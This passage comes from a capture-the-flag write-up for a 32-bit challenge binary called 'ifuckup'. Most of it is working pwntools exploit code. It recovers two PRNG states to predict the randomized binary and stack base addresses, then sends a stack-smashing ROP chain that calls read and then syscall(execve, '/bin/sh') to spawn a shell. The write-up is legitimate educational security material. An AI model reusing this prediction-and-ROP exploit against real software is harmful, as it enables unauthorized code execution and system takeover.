On a connection, the PRNG solver requests the output values from another get_random call by sending NEXT. Once both states have been recovered, the PRNG solver sends FINISH, receives the output of one more get_random call that is used as the last verification the values get correctly predicted, and then sends base addresses of binary and stack that will be current when returning a call to stack_smash after selecting that menu option at the very next opportunity.

def solver(io):
    print('\nGot connection.')
    io.sendline(b'NEXT')
    output_data_new = [json.loads(io.recvline().strip().decode())]
    data_new = make_data_raw(output_data_new)
    # Because we want to start with a 8 int block, not a 4 int block:
    data_new[0] = data_new[0][1:]
    prng0_state_now, _ = solve_prng0(data_new)
    print(f'Recovered PRNG0 state')

    gaps = []
    num_received = 1
    while True:
        io.sendline(b'NEXT')
        prng0_state_now, gaps_new = get_new_gaps(io, prng0_state_now)
        gaps += gaps_new
        num_received += 1
        print(f'\rNumber of get_random blocks received: {num_received:02}', end="")
        prng1_state_now = solve_prng1(gaps)
        if prng1_state_now is not None:
            break

    io.sendline(b'FINISH')
    output_data_new = [json.loads(io.recvline().strip().decode())]
    prng0 = PRNG(prng0_state_now)
    prng1 = PRNG(prng1_state_now)
    prng.relocate(prng0, prng1)
    for block_num, block in enumerate(output_data_new[0]):
        if block_num != 0:
            prng.fast_forward(prng0, prng1)
        for value in block:
            if prng0.step_0() != value:
                raise Exception('Prediction incorrect!')
    print('Fully cought up, know the state of the PRNGs in the running binary')

    for _ in range(3):
        prng.relocate(prng0, prng1)
    for _ in range(99):
        prng0.step_raw()
    prng.relocate(prng0, prng1)
    binary_base_address, stack_base_address = prng.relocate(prng0, prng1)
    binary_base_address &= 0xfffff000
    stack_base_address &= 0xfffff000

    print(f'Predicting binary at 0x{binary_base_address:08x}   stack at 0x{stack_base_address:08x}')
    io.sendline(json.dumps((binary_base_address, stack_base_address)).encode())
    io.close()
    print('Closed connection.\n')

The last part here requires knowing how many times the two PRNGs are advanced until the crucial values used for the base address of binary and stack are obtained. At a high level, the two calls that happen are menu and stack_smash.

In menu, the PRNGs are only interacted with in the one call to read_and_step. Here the first PRNG is advanded num_read - 1 times with num_read the number of characters before the newline that we send. As we will only send a single character, this will be zero. Then there is a call to relocate.

stack_smash has two calls to relocate first, then the call to read, where the first PRNG is again advanced num_read - 1 times, which this time is 993. Then a relocate follows (within read), and then finally another relocate in stack_smash.

Thus in total we have:

  1. 3 calls to relocate
  2. Advance the first PRNG 99 times
  3. Two calls to relocate

In each relocate we have (see the section on relocate above for the details), assuming that any address that is attempted to be mapped can be mapped:

  1. The second PRNG is stepped once to obtain a random number between 0 and 255, and the first PRNG is stepped this many times.
  2. The first PRNG is used to obtain the new base address for the binary.
  3. The second PRNG is stepped once to obtain a random number between 0 and 255, and the first PRNG is stepped this many times.
  4. The first PRNG is used to obtain the new base address for the stack.
  5. The second PRNG is stepped once to obtain a random number between 0 and 255, and the first PRNG is stepped this many times.
  6. The first PRNG is used to obtain the new value for the global current_random.

We can implement this as follows:

def fast_forward(prng0, prng1):
    for _ in range(prng1.step_1()):
        prng0.step_raw()


def relocate(prng0, prng1):
    '''Steps prng0 and prng1 as in relocate, and returns binary_base_address, stack_base_address'''
    fast_forward(prng0, prng1)
    binary_base_address = prng0.step_0()
    fast_forward(prng0, prng1)
    stack_base_address = prng0.step_0()
    fast_forward(prng0, prng1)
    prng0.step_raw()
    return binary_base_address, stack_base_address

From the interaction script side, we automate connecting to the PRNG solver and retrieving the required data. After obtaining the predicted binary and stack base addresses, we can ask for a stack smash. Using the scripted stop handler for GDB that handles relocation, we can without problem debug our payloads by stopping before return of the stack_smash function.

#!/usr/bin/env python3

import sys
import json
import pwnlib.context
import pwnlib.gdb
import pwnlib.tubes.process
import pwnlib.tubes.remote
from pwnlib.util.packing import u8, u16, u32, u64, p8, p16, p32, p64, flat
from pwnlib.elf.elf import ELF

PRNG_SOLVER_PORT = 4321

elf = ELF('./ifuckup')

terminalSetting = ["tmux", "new-window"]
pwnlib.context.context.clear(terminal=terminalSetting, binary=elf, arch='i386')

run_args = [elf.path]
gdbscript = '''
source ./unsetenv.gdb
source ./ifuckupgdb.py
# before return at stack smash
break *0x080496c3
continue
'''

if len(sys.argv) == 2 and sys.argv[1].lower() == 'gdb':
    io = pwnlib.gdb.debug(run_args, gdbscript=gdbscript)
else:
    io = pwnlib.tubes.process.process(run_args)

def menu():
    return io.recvuntil(b'0. Quit\n')

def get_random():
    io.sendline(b'5')
    data = menu()
    data = data.strip().decode().split('\n')[1:-9]
    data = "".join(data).strip()
    data = [[int(x,16) for x in s.split(' ')] for s in data.split(' - ')]
    return data


prng_solver = pwnlib.tubes.remote.remote('localhost', PRNG_SOLVER_PORT)
menu()
num_sent = 0
while True:
    new_data = get_random()
    command = prng_solver.recvline().strip().decode()
    prng_solver.sendline(json.dumps(new_data).encode())
    num_sent += 1
    print(f'\rSent {num_sent:02} get_random outputs to solver.', end="")
    if command == "NEXT":
        pass
    elif command == "FINISH":
        break
print()
print('Solver reports being finished.')
binary_base_address, stack_base_address = json.loads(prng_solver.recvline().strip().decode())
print(f'Predicting binary at 0x{binary_base_address:08x}   stack at 0x{stack_base_address:08x}')

# Ask for stack smash
io.sendline(b'4')
io.recvuntil(b'execution\n')

ROP chain

After the previous steps, we can now overwrite parts of the stack with whatever we want, while knowing the base address of the binary at the time of return to the address we now control. We also know the base address of the mapping the stack is in, but this is less useful because we do not know how much the stack grew, as this depends on the environment, so we can not directly predict the stack pointer.

The binary contains a function syscall(uint number,undefined4 arg0,undefined4 arg1,undefined4 arg2,undefined4 arg3,undefined4 arg4, undefined4 arg5) that we can use to obtain a shell, by calling syscall(11, "/bin/sh", argv, envp,...). Here, 11 is the syscall number for execve. The man page for execve notes:

On  Linux, argv and envp can be specified as NULL.  In both cases, this has the same effect as specifying the argu‐
ment as a pointer to a list containing a single null pointer.  Do not take advantage of this nonstandard  and  non‐
portable  misfeature!   On many other UNIX systems, specifying argv as NULL will result in an error (EFAULT).  Some
other UNIX systems treat the envp==NULL case the same as Linux.

So on Linux we can do syscall(11, "/bin/sh", 0, 0), but not necessarily on other UNIX systems. As we do not know on what system the remote runs, for a more generic solution we should use syscall(11, "/bin/sh", p, p), where p is the address of a doubleword with value 0 (argv and envp will then be interpreted as the empty list).

Since the binary is 32-bit, arguments are passed on the stack. Before we can call syscall, we need to get /bin/sh and a zero doubleword somewhere we know the address of. For this we need a gadget to do this, and a place to put this that is writable and won’t mess anything up.

Looking at the output of readelf -l ./ifuckup:

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  LOAD           0x000000 0x08048000 0x08048000 0x00118 0x00118 R   0x1000
  LOAD           0x001000 0x08049000 0x08049000 0x00aec 0x00aec R E 0x1000
  LOAD           0x002000 0x0804a000 0x0804a000 0x006b8 0x006b8 R   0x1000
  LOAD           0x0026b8 0x0804b6b8 0x0804b6b8 0x0000c 0x00020 RW  0x1000
  NOTE           0x0000f4 0x080480f4 0x080480f4 0x00024 0x00024 R   0x4
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x10

we see that the first 0x3000 bytes of the loaded binary are not writable, but the following page is writable, but with relevant content only starting at offset 0x36b8. We thus have plenty of space in between 0x3000 and 0x36b7 for writing what we want.

To read something in, we can use read(byte *buf, uint num), which reads num bytes into buf from stdin. This function will call relocate and thus relocate the binary again. But this is not a problem: Like other pointers to the binary on the stack, ours will also be adjusted by relocate, so we can ignore this.

We will thus begin our ROP chain with the address for read. The next doubleword will be the return value for the return from read, and then the next two doublewords will be the arguments for read. Because the arguments are part of the caller’s responsibility and hence will not be popped by read, we make the return address for read the address of a pop-pop-ret-gadget, to get rid of the two arguments. We then follow this up with the address for syscall with arguments 11, the address where we wrote /bin/sh, and then twice the address of where we wrote a zero doubleword.

payload = b''
# Padding to get to the return address
payload += b'P'*0x16


# Idea:
# 1. Use read(buffer, 0xC) to read in "/bin/sh\0\0\0\0\0".
#    This will relocate. Note that our addresses will be fixed though, so should be ok without predicting further ahead.
# 2. syscall(execve, address of "/bin/sh", address of zero, address of zero)

# Mapping of the binary is as follows:
# 0x3000 bytes RX
# 0x1000 bytes RW
# at offset 0x36b8 we find 3 doublewords from .got.plt (unused), and then the globals.
# We thus have a lot of space to write stuff.
# We use this to write what we need.
# We will write "/bin/sh", which is 7 bytes, followed by 5 bytes zero, total 12 = 0xC bytes

bin_sh_address = binary_base_address + 0x3010
zero_address = bin_sh_address + 8

### read(bin_sh_address, 0xC)
# read
read_address = binary_base_address + 0x14bb
payload += p32(read_address)

# Return address for read:
# At the end of read (before ret), we still have the return address and two arguments
# on the stack.
pop_twice_ret = binary_base_address + 0x104e
payload += p32(pop_twice_ret)

# buf, argument for read
payload += p32(bin_sh_address)

# num, argument for read
payload += p32(0xC)


### syscall(11=EXECVE, bin_sh_address, zero_address, zero_address) 
# Return address for the pop twice and return gadget, which is syscall.
syscall = binary_base_address + 0x102d
payload += p32(syscall)

# Return address for syscall
payload += p32(0)

# Syscall number
payload += p32(11)

# pathname
payload += p32(bin_sh_address)

# argv
payload += p32(zero_address)

# envp
payload += p32(zero_address)


### Padding
payload += b'A'*(100 - len(payload))

# We also need to send what the read we cause will read in.
payload += b'/bin/sh' + b'\0'*5

io.sendline(payload)

print('Sent payload. Should have shell now:')

io.interactive()

Attachments

The attachment contains the following files:

  • ifuckup: The challenge binary.
  • ifuckupgdb.py: The [handlers for GDB scripted in Python].
  • ifuckup.gdb: Tiny GDB script to import two other files (in case you want to use GDB manually, to have less typing).
  • prng.py: Python module with an implementation of the PRNG.
  • gatherdebugdata.py: Script to gather basic example data.
  • testrev.py: Script to use the gather data to check if it fits with expected behavior.
  • debugunknown.py: Script used to debug the “unknown command” bug.
  • solveprng.py: Solver for the PRNG states.
  • solve.py: Main solve script.

Note, the scripts that use GDB expect to find a file unsetenv.gdb that can be generated with python -c 'import os; print("\n".join("unset environment " + x for x in os.environ.keys()))' > unsetenv.gdb, but it might also work if you leave the file empty.

Footnotes


  1. Unfortunately Ghidra ignores changes to the rounding mode, there is an open issue for this. ↩︎ ↩︎

  2. A bit depending F_2-linearly on some other bits means concretely that this bit is given by xoring together (which is the same as adding modulo 2) a subset of those other bits. ↩︎ ↩︎

  3. The reality is slightly more complicated then this always being 99, see the subsection on read in the reversing section for more details. ↩︎